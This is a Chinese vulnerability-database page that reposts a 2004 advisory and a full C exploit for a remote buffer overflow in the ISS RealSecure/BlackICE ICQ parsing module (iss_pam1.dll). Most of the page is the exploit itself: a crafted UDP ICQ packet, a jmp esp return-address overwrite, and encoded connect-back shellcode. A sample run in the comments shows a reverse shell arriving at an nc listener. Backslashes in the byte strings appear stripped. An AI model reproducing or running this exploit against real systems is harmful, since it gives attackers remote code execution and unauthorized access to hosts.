Internet Security Systems Protocol Analysis Module ICQ – Parsing Buffer Overflow
漏洞ID | 1054424 | 漏洞类型 | |
发布时间 | 2004-03-26 | 更新时间 | 2004-03-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9913/info
It has been reported that the Internet Security Systems (ISS) Protocol Analysis Module is prone to a remote buffer overflow vulnerability when parsing the ICQ protocol. This issue exists due to insufficient bounds checking performed on certain unspecified ICQ protocol fields supplied in ICQ response data.
Successful exploitation of this issue may allow a remote attacker to execute arbitrary code on a vulnerable system in order to gain unauthorized access. This attack would occur in the context of the vulnerable process.
This module is used to parse network protocols and is included in a number of products provided by ISS, including various RealSecure and BlackICE releases.
/* 557iss_pam_exp - RealSecure / Blackice ICQ iss_pam1.dll remote overflow exploit
*
* Copyright (c) SST 2004 All rights reserved.
*
* Public version
*
* code by Sam (Sam`@efnet) and 2004/03/26
* <[email protected]>
* <[email protected]>
*
*
*
* Compile: gcc -o 557iss_pam_exp 557iss_pam_exp.c
*
* how works?
* [root@core exp]# ./557iss_pam_exp 192.168.10.2 192.168.10.169 5570
* 557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit
* - Sam
*
* # attack remote host: 192.168.10.2.
* # listen host: 192.168.10.169.
* # listen port: 5570.
* # send overflow udp datas
* # 1199 bytes send
* # done.
* # make sure we are in, dude :)
*
*
* [root@core root]# nc -vv -l -p 5570
* listening on [any] 5570 ...
* 192.168.10.2: inverse host lookup failed: Host name lookup failure
* connect to [192.168.10.169] from (UNKNOWN) [192.168.10.2] 3604
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:Program FilesISSBlackICE>
* C:Program FilesISSBlackICE>
* C:Program FilesISSBlackICE>
*
*
* some thanks/greets to:
* eeye (they find this bug :D), airsupply, kkqq, icbm, my gf :I
* and everyone else who's KNOW SST ;P
* http://0x557.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <assert.h>
#include <fcntl.h>
#include <sys/time.h>
char icq_header [] =
"x05x00" // ICQ VERSION
"x00" // unused
"x00x00x00x00" // Session ID
"x12x02" // reply to SRV_MULTI_PACKET
"x00x00x00x00" // SEQ_NUM1 and SEQ_NUM2
"x00x00x00x00" // UIN Your (the client's) UIN
"x00x00x00x00" // CHECKCODE
"x02" // SRV_MULTI Parameter Block 1 of 2
// Number of individual responses
"x2cx00" // Size of sub-response (44 bytes, little-endian)
"x05x00" // ICQ VERSION
"x00" // unused
"x00x00x00x00" // Session ID
"x6ex00" // reply to SRV_USER_OLINE
"x00x00x00x00" // SEQ_NUM1 and SEQ_NUM2
"x00x00x00x00" // UIN Your (the client's) UIN
"x00x00x00x00" // CHECKCODE
"x00x00x00x00" // UIN of user changing status
"x01x00x00x00" // Other user's IP address (1.0.0.0)
"x00x00x00x00" // Other user's direct-connect port (default)
"x00"
"x00x00x00x00"
"x00x00x00x00"
"x00x00"
"x41x02" // SRV_MULTI Parameter Block 2 of 2
// Size of sub-response (577 bytes)
"x05x00" // ICQ VERSION
"x00" // unused
"x00x00x00x00" // Session ID
"xdex03" // reply to SRV_META_USER
"x00x00x00x00" // SEQ_NUM1 and SEQ_NUM2
"x00x00x00x00" // UIN Your (the client's) UIN
"x00x00x00x00" // CHECKCODE
"x00x00x00x01"
"x00x00x01x00"
"x00x01x00x00"
"x1ex02";
struct sockaddr_in addr, local;
char *bindHost = NULL;
unsigned short port;
/*
* hsj's connect back shellcodes
*/
char shellcode [] =
/* decoder */
"xebx02xebx05xe8xf9xffxffxffx58x83xc0x1bx8dxa0x01"
"xfcxffxffx83xe4xfcx8bxecx33xc9x66xb9x99x01x80x30"
"x93x40xe2xfa"
/* code */
"x7bxe4x93x93x93xd4xf6xe7xc3xe1xfcxf0xd2xf7xf7xe1"
"xf6xe0xe0x93xdfxfcxf2xf7xdfxfaxf1xe1xf2xe1xeaxd2"
"x93xd0xe1xf6xf2xe7xf6xc3xe1xfcxf0xf6xe0xe0xd2x93"
"xd0xffxfcxe0xf6xdbxf2xfdxf7xffxf6x93xd6xebxfaxe7"
"xc7xfbxe1xf6xf2xf7x93xe4xe0xa1xccxa0xa1x93xc4xc0"
"xd2xc0xe7xf2xe1xe7xe6xe3x93xc4xc0xd2xc0xfcxf0xf8"
"xf6xe7xd2x93xf0xffxfcxe0xf6xe0xfcxf0xf8xf6xe7x93"
"xf0xfcxfdxfdxf6xf0xe7x93xf0xfexf7x93xc9xc1x28x93"
"x93x63xe4x12xa8xdexc9x03x93xe7x90xd8x78x66x18xe0"
"xafx90x60x18xe5xebx90x60x18xedxb3x90x68x18xddx87"
"xc5xa0x53xc4xc2x18xacx90x68x18x61xa0x5ax22x9dx60"
"x35xcaxccxe7x9bx10x54x97xd3x71x7bx6cx72xcdx18xc5"
"xb7x90x40x42x73x90x51xa0x5axf5x18x9bx18xd5x8fx90"
"x50x52x72x91x90x52x18x83x90x40xcdx18x6dxa0x5ax22"
"x97x7bx08x93x93x93x10x55x98xc1xc5x6cxc4x63xc9x18"
"x4bxa0x5ax22x97x7bx14x93x93x93x10x55x9bxc6xfbx92"
"x92x93x93x6cxc4x63x16x53xe6xe0xc3xc3xc3xc3xd3xc3"
"xd3xc3x6cxc4x67x10x6bx6cxe7xf0x18x4bxf5x54xd6x93"
"x91x93xf5x54xd6x91x28x39x54xd6x97x4ex5fx28x39xf9"
"x83xc6xc0x6cxc4x6fx16x53xe6xd0xa0x5ax22x82xc4x18"
"x6ex60x38xccx54xd6x93xd7x93x93x93x1axcexafx1axce"
"xabx1axcexd3x54xd6xbfx92x92x93x93x1exd6xd7xc3xc6"
"xc2xc2xc2xd2xc2xdaxc2xc2xc5xc2x6cxc4x77x6cxe6xd7"
"x6cxc4x7bx6cxe6xdbx6cxc4x7bxc0x6cxc4x6bxc3x6cxc4"
"x7fx19x95xd5x17x53xe6x6axc2xc1xc5xc0x6cx41xc9xca"
"x1ax94xd4xd4xd4xd4x71x7ax50";
/* udpconnect:
*
*/
int udpConnect (char *hostName)
{
struct hostent* host = NULL;
int sock = -1;
host = gethostbyname (hostName);
if (NULL == host) {
perror ("gethostbyname() failed");
return -1;
}
sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if ( -1 == sock) {
perror ("socket() failedn");
return -1;
}
memset (&addr, 0x00, sizeof (addr));
addr.sin_addr = *(struct in_addr *) host->h_addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(random());
memset (&local, 0x00, sizeof (local));
local.sin_family = AF_INET;
local.sin_addr.s_addr = htonl (INADDR_ANY);
local.sin_port = htons(4000);
if (bind (sock, (struct sockaddr *) &local, sizeof(local)) != 0) {
perror ("bind errorn");
return -1;
}
return sock;
}
/* resolve listen host
*/
unsigned int resolve (char *name)
{
struct hostent *he;
unsigned int ip;
if ((ip = inet_addr (name)) == (-1)) {
if ((he = gethostbyname (name)) ==0 )
return 0;
memcpy (&ip, he->h_addr, 4);
}
return ip;
}
/*
* send datas
*/
int udp_send (int sock, char *buffer, int buff_len)
{
int ret;
ret = sendto (sock, buffer, buff_len, 0, (struct sockaddr *)&addr,
sizeof (struct sockaddr_in));
if (ret <= NULL) {
perror ("sendto failedn");
return -1;
}
fprintf (stderr, "# %d bytes sendn", ret);
return ret;
}
/*
* send evil datas, fuck ISS's blackice.
*/
int do_sendudp_data (char *hostName)
{
unsigned int cb;
int sock;
char expbuf[1200];
memset (expbuf, 0x90, sizeof (expbuf));
memcpy (expbuf, icq_header, sizeof (icq_header) - 1);
/*
* jmp esp opcodes from iss_pam1.dll
*/
*(unsigned int *)&expbuf[637] = 0x5e077663;
if (!(cb = resolve (bindHost))) {
printf ("Unknown listen hostn");
return -1;
}
port = htons (port);
port ^= 0x9393;
cb ^= 0x93939393;
*(unsigned short *)&shellcode[330] = port;
*(unsigned int *)&shellcode[335] = cb;
memcpy (expbuf + 637 + 4, shellcode, strlen (shellcode));
if ((sock = udpConnect (hostName)) < 0) {
printf ("connect failedn");
exit (-1);
}
fprintf (stderr, "# send overflow udp datasn");
udp_send (sock, expbuf, sizeof (expbuf) - 1);
close (sock);
return 0;
}
/*
* just main . dude.
*/
int main (int argc, char **argv)
{
int new;
char *target = NULL;
fprintf (stderr, "557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploitn - Samnn");
if (argc != 4) {
fprintf (stderr, "%s <hostname> <listenhost> <listen port>n", argv[0]);
fprintf (stderr, "listenhost, port: connect back host and portnn");
return -1;
}
target = argv[1];
bindHost = argv[2];
port = atoi (argv[3]);
fprintf (stderr, "# attack remote host: %s. n", target);
fprintf (stderr, "# listen host: %s. n", bindHost);
fprintf (stderr, "# listen port: %d. n", port);
do_sendudp_data (target);
fprintf (stderr, "# done.n");
fprintf (stderr, "# make sure we are in, dude :)nn");
return 0;
}
相关推荐: Trend Micro InterScan VirusWall内容-编码绕过漏洞
Trend Micro InterScan VirusWall内容-编码绕过漏洞 漏洞ID 1203332 漏洞类型 权限许可和访问控制 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2395 CNNVD-ID …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666